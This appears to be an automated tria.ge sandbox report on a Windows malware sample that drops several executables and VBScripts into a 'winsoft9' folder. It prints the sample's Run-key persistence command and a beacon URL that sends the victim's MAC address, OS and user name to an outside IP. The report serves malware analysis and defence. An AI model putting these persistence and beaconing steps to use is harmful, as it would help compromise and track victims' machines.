Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
178s -
max time network
71s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
01/12/2022, 13:51
Static task
static1
Behavioral task
behavioral1
Sample
ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe
Resource
win10v2004-20220812-en
General
-
Target
ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe
-
Size
365KB
-
MD5
56d60722af183b394ddb2760e261909e
-
SHA1
e87182c5b3a6b772a26d601aef6366182c560915
-
SHA256
ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda
-
SHA512
ed852a3cb6bb720882c4b34e5b2117e59c8c64c0e83ec0441cd90ce394061b90f8b35210d31abc72094c79a039bb97ff52f82cf9276e8ea5c766e91f9efb7862
-
SSDEEP
6144:pTfFDbRnOTr085p8mkJeapssUZn7kyPTd4lnqukJja9zTK:v5Oc85prapshZn7/B5cG
Malware Config
Signatures
-
Executes dropped EXE 3 IoCs
pid Process 4752 t2.exe 4712 bho.exe 4640 test.exe -
resource yara_rule behavioral2/files/0x000300000001e561-133.dat upx behavioral2/files/0x000300000001e561-134.dat upx behavioral2/memory/4752-139-0x0000000000400000-0x0000000000421000-memory.dmp upx behavioral2/files/0x00070000000162a6-142.dat upx behavioral2/files/0x00070000000162a6-141.dat upx behavioral2/memory/4640-146-0x0000000000400000-0x0000000000424000-memory.dmp upx behavioral2/memory/4752-149-0x0000000000400000-0x0000000000421000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\micrososot = "c:\\program files (x86)\\winsoft9\\t2.exe " reg.exe -
Drops file in Program Files directory 32 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\winsoft9\9ptv.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\3.vbs ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\mm.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\mm.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\test.exe ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\WINDOWS ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\bho.exe ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\77zb.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\WINDOWS\time\mian.dil ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\game.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\kusila.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\qq.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\WINDOWS\time\mian.dll ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\bho.exe ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\1.vbs ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\WINDOWS\time\mian.dll ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\t2.exe ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\kusila.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\__tmp_rar_sfx_access_check_240576843 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\9ptv.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\77zb.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\qq.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\taobao.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\1.vbs ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\test.exe ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\WINDOWS\time\mian.dil ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\3.vbs ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\t2.exe ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\taobao.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File opened for modification C:\Program Files (x86)\winsoft9\WINDOWS\time ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe File created C:\Program Files (x86)\winsoft9\game.ico ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Survival_0.txt t2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\2022123 test.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70449e9d5507d901 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{CD19591C-7348-11ED-B696-FE977829BE37} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{CE1611C6-7348-11ED-B696-FE977829BE37} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376261073" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376261072" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000089d5003225ceb4ea6f34fc53c1ba985000000000200000000001066000000010000200000005c86b9771095049c13a4f5ea7620353ee62613b671cf4b541751706730ec011f000000000e80000000020000200000003556fcb5002a767140705f4df60037754a637704882f11b6b12bb04c2e327969200000007f3a307114e208ee61b683406fc59cbc3e6dc39ef32d2b882dce2e896423f14b40000000f1f8df5de623d31bd4c46ea3757df670795ff8689c3c9c02ee8f2f61830e40b638b6aeb2d52993ac6d2d61182ae9e4cf6ec5cd62ee29f439f5494255c7bfc0ab iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe 4752 t2.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4732 iexplore.exe 3360 iexplore.exe 4732 iexplore.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
pid Process 4752 t2.exe 4732 iexplore.exe 4732 iexplore.exe 4752 t2.exe 4752 t2.exe 3360 iexplore.exe 3360 iexplore.exe 4732 iexplore.exe 4732 iexplore.exe 2416 IEXPLORE.EXE 2416 IEXPLORE.EXE 5076 IEXPLORE.EXE 5076 IEXPLORE.EXE 2416 IEXPLORE.EXE 2416 IEXPLORE.EXE 2416 IEXPLORE.EXE 2416 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 420 wrote to memory of 4752 420 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 81 PID 420 wrote to memory of 4752 420 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 81 PID 420 wrote to memory of 4752 420 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 81 PID 420 wrote to memory of 4712 420 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 82 PID 420 wrote to memory of 4712 420 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 82 PID 420 wrote to memory of 4712 420 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 82 PID 420 wrote to memory of 4640 420 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 83 PID 420 wrote to memory of 4640 420 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 83 PID 420 wrote to memory of 4640 420 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 83 PID 420 wrote to memory of 3068 420 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 84 PID 420 wrote to memory of 3068 420 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 84 PID 420 wrote to memory of 3068 420 ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe 84 PID 4640 wrote to memory of 4732 4640 test.exe 85 PID 4640 wrote to memory of 4732 4640 test.exe 85 PID 4732 wrote to memory of 2416 4732 iexplore.exe 88 PID 4732 wrote to memory of 2416 4732 iexplore.exe 88 PID 4732 wrote to memory of 2416 4732 iexplore.exe 88 PID 3360 wrote to memory of 5076 3360 iexplore.exe 89 PID 3360 wrote to memory of 5076 3360 iexplore.exe 89 PID 3360 wrote to memory of 5076 3360 iexplore.exe 89 PID 4752 wrote to memory of 2452 4752 t2.exe 98 PID 4752 wrote to memory of 2452 4752 t2.exe 98 PID 4752 wrote to memory of 2452 4752 t2.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe"C:\Users\Admin\AppData\Local\Temp\ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:420 -
C:\Program Files (x86)\winsoft9\t2.exe"C:\Program Files (x86)\winsoft9\t2.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "micrososot" /d "c:\program files (x86)\winsoft9\t2.exe " /f3⤵
- Adds Run key to start application
PID:2452
-
-
-
C:\Program Files (x86)\winsoft9\bho.exe"C:\Program Files (x86)\winsoft9\bho.exe"2⤵
- Executes dropped EXE
PID:4712
-
-
C:\Program Files (x86)\winsoft9\test.exe"C:\Program Files (x86)\winsoft9\test.exe"2⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=fe-97-78-29-be-37&os=Microsoft Windows XP&flag=9b1253cd8772f8c1d9bce90b8bc6c135&user=test3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4732 CREDAT:17410 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2416
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\winsoft9\1.vbs"2⤵PID:3068
-
-
C:\Program Files (x86)\Internet Explorer\ielowutil.exe"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding1⤵PID:1988
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3360 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5076
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
154B
MD5efafb2e23c3a56c7c0a585c8f3a74c15
SHA124e2f29d57199a01d8e521b2468cfb2e4d338b3a
SHA25645a4effd474083ae4bf4b8cef347f78c9d243aee6a7a9dd01b2fc9a069f26678
SHA5129bc509ead39fef370be722e2e90730ce089857107d4d1d273502f85da26e213031e8f3a1e14f7d174274bf936121ea067c438850d36c510ef0ab37f7b8cba2ee
-
Filesize
65KB
MD54ba9a7d68cf22eef4354e6695b14109c
SHA120b6adf9febd22fa74662bf8dfd5a4f5803eda38
SHA2569e57af5d4f49661f342fc3e3f77db9b5d04cc861d1c102c44bfb663e9a167fee
SHA512907c73851032ab3ac07ea33bcba794bfce3c429787e34e5e85724c9011abad6277b235613db6da8ecd47619327b2cff14af89792943f248282f7a5e386aa85ac
-
Filesize
65KB
MD54ba9a7d68cf22eef4354e6695b14109c
SHA120b6adf9febd22fa74662bf8dfd5a4f5803eda38
SHA2569e57af5d4f49661f342fc3e3f77db9b5d04cc861d1c102c44bfb663e9a167fee
SHA512907c73851032ab3ac07ea33bcba794bfce3c429787e34e5e85724c9011abad6277b235613db6da8ecd47619327b2cff14af89792943f248282f7a5e386aa85ac
-
Filesize
12.9MB
MD5c59ad09f4eb12b46a7ba0a38227da51e
SHA106b7396f728ff236b8ef13d2416fef312e592939
SHA2569b46fb443da0aab5aa10aa0e630b2a8b30cd7476f559c0ead337af9f25095316
SHA512f6e3ad3230bd1beae8e30d17f1e7338a1a13cfb1c5eb3c79acdcaf1c1a3d20e7401f691e23df7e188b0ff6a0f81279bb5812893eab2493501cb232dee20ef145
-
Filesize
12.9MB
MD5c59ad09f4eb12b46a7ba0a38227da51e
SHA106b7396f728ff236b8ef13d2416fef312e592939
SHA2569b46fb443da0aab5aa10aa0e630b2a8b30cd7476f559c0ead337af9f25095316
SHA512f6e3ad3230bd1beae8e30d17f1e7338a1a13cfb1c5eb3c79acdcaf1c1a3d20e7401f691e23df7e188b0ff6a0f81279bb5812893eab2493501cb232dee20ef145
-
Filesize
12.9MB
MD5715c3c7d943e785d326bf4d8940bfd2a
SHA1519ba001798b16ad089f409c738d869c91202d8c
SHA256b1d0c0813470896ca9d85c7e7604d10ae63c528f4d85f70a77e82233d659bfd7
SHA5120901f98b09ed9136062c59fd5feed75b514dffa94bc272d1564ca574822e03b0fb9b7bab975858838443dfe3d243d4af92596789d0a2f0f52b52014207fddf90
-
Filesize
12.9MB
MD5715c3c7d943e785d326bf4d8940bfd2a
SHA1519ba001798b16ad089f409c738d869c91202d8c
SHA256b1d0c0813470896ca9d85c7e7604d10ae63c528f4d85f70a77e82233d659bfd7
SHA5120901f98b09ed9136062c59fd5feed75b514dffa94bc272d1564ca574822e03b0fb9b7bab975858838443dfe3d243d4af92596789d0a2f0f52b52014207fddf90
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CD19591C-7348-11ED-B696-FE977829BE37}.dat
Filesize3KB
MD5d2490eb16f633c6e117c3ed4e011ba38
SHA1f61464f78aa797ac12281b97f3d8ce533233f60e
SHA256ad8b26a343953ad8d5d03b4e66e887412b0cff394e88f655e21759035f25c43d
SHA5124252a86c0790ff7db7ed90bfb06343b398b06195826c77e785004a7ef4b2c47f198568e3a88c12e1f841a90ccd1a3e23d2912047e945380cae709fd952106b25
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CE1611C6-7348-11ED-B696-FE977829BE37}.dat
Filesize5KB
MD53ae7e547c0dec46fec57d69a9abc8265
SHA122d7a77e6ade3b3b0c871f6cb5c8096a0941eea3
SHA2569b808567e382ce3f57f0efdceb82a6a988af7b8ed0319d44f09f5e42a264ae2a
SHA512691887bbafe423787d8ea1f3ccb90ad6a09df0caae4ef73392c3a876658c1c53e0bd5b998692d24ecae38e34a6242b280107b1d41de424753bf40e8880a29f53